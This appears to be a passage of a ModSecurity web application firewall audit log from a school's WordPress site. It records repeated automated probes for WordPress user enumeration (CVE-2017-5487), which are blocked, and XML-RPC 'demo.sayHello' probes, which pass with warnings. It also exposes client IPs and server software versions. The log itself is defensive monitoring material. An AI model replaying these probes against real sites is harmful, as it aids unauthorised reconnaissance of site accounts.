charset=iso-8859-1 --d733a07b-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746836627946197 4762 (- - -) Stopwatch2: 1746836627946197 4762; combined=3600, p1=459, p2=2931, p3=25, p4=24, p5=93, sr=76, sw=68, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d733a07b-Z-- --3ef78728-A-- [10/May/2025:07:23:55 +0700] aB6cmxLuBiaF9R054QBZYQAAABc 103.236.140.4 51398 103.236.140.4 8181 --3ef78728-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.114.39 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.114.39 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --3ef78728-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3ef78728-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746836635951735 2447 (- - -) Stopwatch2: 1746836635951735 2447; combined=1134, p1=381, p2=724, p3=0, p4=0, p5=29, sr=70, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3ef78728-Z-- --93d8ec29-A-- [10/May/2025:07:23:59 +0700] aB6cn9r9PbfRBMhzxmRZ4gAAAEg 103.236.140.4 51400 103.236.140.4 8181 --93d8ec29-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.95.96 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.95.96 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --93d8ec29-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --93d8ec29-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746836639084957 2856 (- - -) Stopwatch2: 1746836639084957 2856; combined=1261, p1=446, p2=784, p3=0, p4=0, p5=31, sr=88, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --93d8ec29-Z-- --4f2bf356-A-- [10/May/2025:07:24:01 +0700] aB6coRLuBiaF9R054QBZYwAAAAM 103.236.140.4 51406 103.236.140.4 8181 --4f2bf356-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.114.39 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.114.39 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --4f2bf356-C-- demo.sayHello --4f2bf356-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --4f2bf356-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746836641951343 6491 (- - -) Stopwatch2: 1746836641951343 6491; combined=4689, p1=582, p2=3774, p3=97, p4=75, p5=96, sr=76, sw=65, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4f2bf356-Z-- --7033f847-A-- [10/May/2025:07:24:03 +0700] aB6co9r9PbfRBMhzxmRZ4wAAAEk 103.236.140.4 51408 103.236.140.4 8181 --7033f847-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.95.96 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.95.96 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --7033f847-C-- demo.sayHello --7033f847-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --7033f847-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746836643937029 5449 (- - -) Stopwatch2: 1746836643937029 5449; combined=4015, p1=539, p2=3250, p3=26, p4=31, p5=98, sr=135, sw=71, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7033f847-Z-- --b2326a44-A-- [10/May/2025:07:24:21 +0700] aB6ctdr9PbfRBMhzxmRZ5gAAAEw 103.236.140.4 51414 103.236.140.4 8181 --b2326a44-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.95.193 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.95.193 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --b2326a44-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b2326a44-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746836661133237 3231 (- - -) Stopwatch2: 1746836661133237 3231; combined=1459, p1=476, p2=951, p3=0, p4=0, p5=32, sr=80, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b2326a44-Z-- --bc810668-A-- [10/May/2025:07:24:24 +0700] aB6cuNr9PbfRBMhzxmRZ6AAAAE8 103.236.140.4 51418 103.236.140.4 8181 --bc810668-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.95.193 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.95.193 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --bc810668-C-- demo.sayHello --bc810668-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --bc810668-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746836664394400 4508 (- - -) Stopwatch2: 1746836664394400 4508; combined=3519, p1=429, p2=2890, p3=26, p4=24, p5=88, sr=66, sw=62, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --bc810668-Z-- --2b748826-A-- [10/May/2025:07:24:30 +0700] aB6cvtr9PbfRBMhzxmRZ6QAAAFI 103.236.140.4 51422 103.236.140.4 8181 --2b748826-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.204.64 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.204.64 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --2b748826-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2b748826-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746836670415330 3428 (- - -) Stopwatch2: 1746836670415330 3428; combined=1407, p1=462, p2=914, p3=0, p4=0, p5=31, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2b748826-Z-- --1c56d741-A-- [10/May/2025:07:24:34 +0700] aB6cwhLuBiaF9R054QBZZgAAAAI 103.236.140.4 51434 103.236.140.4 8181 --1c56d741-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.204.64 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.204.64 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --1c56d741-C-- demo.sayHello --1c56d741-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --1c56d741-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746836674687722 6873 (- - -) Stopwatch2: 1746836674687722 6873; combined=4954, p1=601, p2=3984, p3=39, p4=42, p5=159, sr=76, sw=129, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1c56d741-Z-- --a4fd8607-A-- [10/May/2025:07:24:37 +0700] aB6cxci6w7GTj2w44Z6a_QAAAMU 103.236.140.4 51440 103.236.140.4 8181 --a4fd8607-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.102.154 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.102.154 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --a4fd8607-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a4fd8607-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746836677954355 2097 (- - -) Stopwatch2: 1746836677954355 2097; combined=954, p1=339, p2=588, p3=0, p4=0, p5=26, sr=67, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a4fd8607-Z-- --e19bae5c-A-- [10/May/2025:07:24:41 +0700] aB6cyci6w7GTj2w44Z6a_wAAAMo 103.236.140.4 51444 103.236.140.4 8181 --e19bae5c-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.102.154 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.102.154 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --e19bae5c-C-- demo.sayHello --e19bae5c-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --e19bae5c-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746836681161925 4742 (- - -) Stopwatch2: 1746836681161925 4742; combined=3720, p1=454, p2=3071, p3=23, p4=24, p5=88, sr=65, sw=60, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e19bae5c-Z-- --6601cb45-A-- [10/May/2025:07:24:41 +0700] aB6cyci6w7GTj2w44Z6bAAAAAMw 103.236.140.4 51446 103.236.140.4 8181 --6601cb45-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.248.84.188 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.248.84.188 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --6601cb45-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6601cb45-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746836681782369 2483 (- - -) Stopwatch2: 1746836681782369 2483; combined=1154, p1=382, p2=745, p3=0, p4=0, p5=27, sr=111, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6601cb45-Z-- --11b28c03-A-- [10/May/2025:07:24:44 +0700] aB6czKuC4AqLGUOyzyX7OwAAAIk 103.236.140.4 51450 103.236.140.4 8181 --11b28c03-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 103.152.117.150 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 103.152.117.150 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --11b28c03-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --11b28c03-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746836684951161 2344 (- - -) Stopwatch2: 1746836684951161 2344; combined=1053, p1=360, p2=666, p3=0, p4=0, p5=27, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --11b28c03-Z-- --3579802c-A-- [10/May/2025:07:24:47 +0700] aB6cz8i6w7GTj2w44Z6bAgAAAMs 103.236.140.4 51454 103.236.140.4 8181 --3579802c-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.248.84.188 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.248.84.188 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --3579802c-C-- demo.sayHello --3579802c-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --3579802c-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746836687838342 5316 (- - -) Stopwatch2: 1746836687838342 5316; combined=4055, p1=442, p2=3302, p3=31, p4=27, p5=156, sr=67, sw=97, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3579802c-Z-- --087c5657-A-- [10/May/2025:07:24:49 +0700] aB6c0auC4AqLGUOyzyX7PQAAAIw 103.236.140.4 51456 103.236.140.4 8181 --087c5657-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.204.171 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.204.171 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --087c5657-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --087c5657-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746836689102405 2111 (- - -) Stopwatch2: 1746836689102405 2111; combined=976, p1=331, p2=619, p3=0, p4=0, p5=26, sr=70, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --087c5657-Z-- --ce66f157-A-- [10/May/2025:07:24:58 +0700] aB6c2si6w7GTj2w44Z6bBAAAAM4 103.236.140.4 51464 103.236.140.4 8181 --ce66f157-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.204.171 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.204.171 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --ce66f157-C-- demo.sayHello --ce66f157-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --ce66f157-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746836698740242 5915 (- - -) Stopwatch2: 1746836698740242 5915; combined=4342, p1=569, p2=3535, p3=33, p4=32, p5=100, sr=119, sw=73, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ce66f157-Z-- --5b308874-A-- [10/May/2025:07:25:05 +0700] aB6c4ci6w7GTj2w44Z6bBQAAAM8 103.236.140.4 51468 103.236.140.4 8181 --5b308874-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.83.108 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.83.108 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --5b308874-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5b308874-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746836705678789 3182 (- - -) Stopwatch2: 1746836705678789 3182; combined=1416, p1=490, p2=893, p3=0, p4=0, p5=32, sr=76, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5b308874-Z-- --86f5602c-A-- [10/May/2025:07:25:12 +0700] aB6c6Mi6w7GTj2w44Z6bBgAAANU 103.236.140.4 51472 103.236.140.4 8181 --86f5602c-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.83.108 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.83.108 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: 